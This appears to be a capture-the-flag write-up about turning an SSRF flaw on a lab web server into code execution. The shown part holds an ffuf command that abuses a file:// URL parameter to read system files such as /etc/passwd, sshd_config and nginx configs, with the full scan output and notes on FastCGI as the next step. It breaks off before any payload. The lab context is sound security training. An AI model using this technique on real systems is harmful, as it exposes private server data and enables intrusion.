Description

Obtain RCE on the host utils.edu.stf (10.124.1.237).

To get the flag, run the script /home/rceflag.

Continuing from the previous task, we already knew that the site has SSRF vulnerabilities. Now, we want to leverage these vulnerabilities to achieve remote code execution (RCE).

First, I scanned for any accessible files on the server,and discovered some interesting files.

┌──(kali㉿kali)-[~/Desktop]
└─$ ffuf -u <http://utils.edu.stf/convert.php?url=file://FUZZ> -w /usr/share/seclists/Fuzzing/LFI/LFI-linux-and-windows_by-1N3@CrowdShield.txt  -fs 1018

        /'___\\  /'___\\           /'___\\       
       /\\ \\__/ /\\ \\__/  __  __  /\\ \\__/       
       \\ \\ ,__\\\\ \\ ,__\\/\\ \\/\\ \\ \\ \\ ,__\\      
        \\ \\ \\_/ \\ \\ \\_/\\ \\ \\_\\ \\ \\ \\ \\_/      
         \\ \\_\\   \\ \\_\\  \\ \\____/  \\ \\_\\       
          \\/_/    \\/_/   \\/___/    \\/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : <http://utils.edu.stf/convert.php?url=file://FUZZ>
 :: Wordlist         : FUZZ: /usr/share/seclists/Fuzzing/LFI/LFI-linux-and-windows_by-1N3@CrowdShield.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response size: 1018
________________________________________________

/etc/crontab            [Status: 200, Size: 15268, Words: 397, Lines: 223, Duration: 236ms]
/etc/fstab              [Status: 200, Size: 15056, Words: 391, Lines: 220, Duration: 239ms]
/etc/crontab            [Status: 200, Size: 15268, Words: 397, Lines: 223, Duration: 252ms]
/etc/fstab              [Status: 200, Size: 15056, Words: 391, Lines: 220, Duration: 252ms]
/etc/group              [Status: 200, Size: 15274, Words: 393, Lines: 220, Duration: 365ms]
/etc/group              [Status: 200, Size: 15274, Words: 393, Lines: 220, Duration: 245ms]
/etc/hosts              [Status: 200, Size: 14734, Words: 388, Lines: 219, Duration: 245ms]
/etc/hosts              [Status: 200, Size: 14734, Words: 388, Lines: 219, Duration: 221ms]
/etc/nginx/nginx.conf   [Status: 200, Size: 15595, Words: 392, Lines: 222, Duration: 235ms]
/etc/issue              [Status: 200, Size: 14608, Words: 388, Lines: 218, Duration: 230ms]
/etc/issue              [Status: 200, Size: 14608, Words: 388, Lines: 218, Duration: 231ms]
/etc/passwd             [Status: 200, Size: 15514, Words: 392, Lines: 218, Duration: 272ms]
/etc/motd               [Status: 200, Size: 14859, Words: 390, Lines: 220, Duration: 241ms]
/etc/motd               [Status: 200, Size: 14859, Words: 390, Lines: 220, Duration: 240ms]
/etc/nginx/sites-available/default  [Status: 200, Size: 16184, Words: 393, Lines: 227, Duration: 259ms]
/etc/nginx/nginx.conf   [Status: 200, Size: 15595, Words: 392, Lines: 222, Duration: 233ms]
/etc/nginx/sites-available/default [Status: 200, Size: 16184, Words: 393, Lines: 227, Duration: 257ms]
/etc/nginx/sites-enabled/default [Status: 200, Size: 16184, Words: 393, Lines: 227, Duration: 281ms]
/etc/nginx/sites-enabled/default  [Status: 200, Size: 16184, Words: 393, Lines: 227, Duration: 287ms]
/etc/passwd             [Status: 200, Size: 15514, Words: 392, Lines: 218, Duration: 270ms]
/etc/ssh/sshd_config    [Status: 200, Size: 16740, Words: 398, Lines: 227, Duration: 256ms]
/etc/ssh/sshd_config    [Status: 200, Size: 16740, Words: 398, Lines: 227, Duration: 257ms]
/proc/cmdline           [Status: 200, Size: 14700, Words: 388, Lines: 218, Duration: 218ms]
/proc/cmdline           [Status: 200, Size: 14700, Words: 388, Lines: 218, Duration: 217ms]
/proc/self/cmdline      [Status: 200, Size: 14595, Words: 390, Lines: 217, Duration: 224ms]
/proc/self/cmdline      [Status: 200, Size: 14595, Words: 390, Lines: 217, Duration: 225ms]
/proc/self/stat         [Status: 200, Size: 14799, Words: 389, Lines: 220, Duration: 227ms]
/proc/self/stat         [Status: 200, Size: 14798, Words: 389, Lines: 220, Duration: 227ms]
/proc/self/status       [Status: 200, Size: 15284, Words: 392, Lines: 222, Duration: 234ms]
/proc/self/status       [Status: 200, Size: 15282, Words: 393, Lines: 219, Duration: 233ms]
/proc/version           [Status: 200, Size: 14716, Words: 391, Lines: 217, Duration: 243ms]
/proc/version           [Status: 200, Size: 14716, Words: 391, Lines: 217, Duration: 242ms]
/var/log/lastlog        [Status: 200, Size: 14653, Words: 388, Lines: 218, Duration: 246ms]
/var/log/lastlog        [Status: 200, Size: 14653, Words: 388, Lines: 218, Duration: 260ms]
/var/run/utmp           [Status: 200, Size: 14728, Words: 390, Lines: 218, Duration: 226ms]
/var/run/utmp           [Status: 200, Size: 14728, Words: 390, Lines: 218, Duration: 244ms]
/var/log/wtmp           [Status: 200, Size: 21289, Words: 664, Lines: 321, Duration: 576ms]
/var/log/wtmp           [Status: 200, Size: 21289, Words: 664, Lines: 321, Duration: 637ms]
:: Progress: [1155/1155] :: Job [1/1] :: 187 req/sec :: Duration: [0:00:07] :: Errors: 0 ::
                                                                                                           

Then i searched for /etc/passwd and confirmed it was accessible

Another intersting file that i found is the /etc/nginx/sites-available/default

/etc/nginx/sites-available/default is the default Nginx config. It shows how .php files go to PHP-FPM (port 9000 or socket), which is key for FastCGI exploits

FastCGI is the protocol that lets Nginx forward PHP requests to PHP-FPM, which executes the code and returns the result to the web server.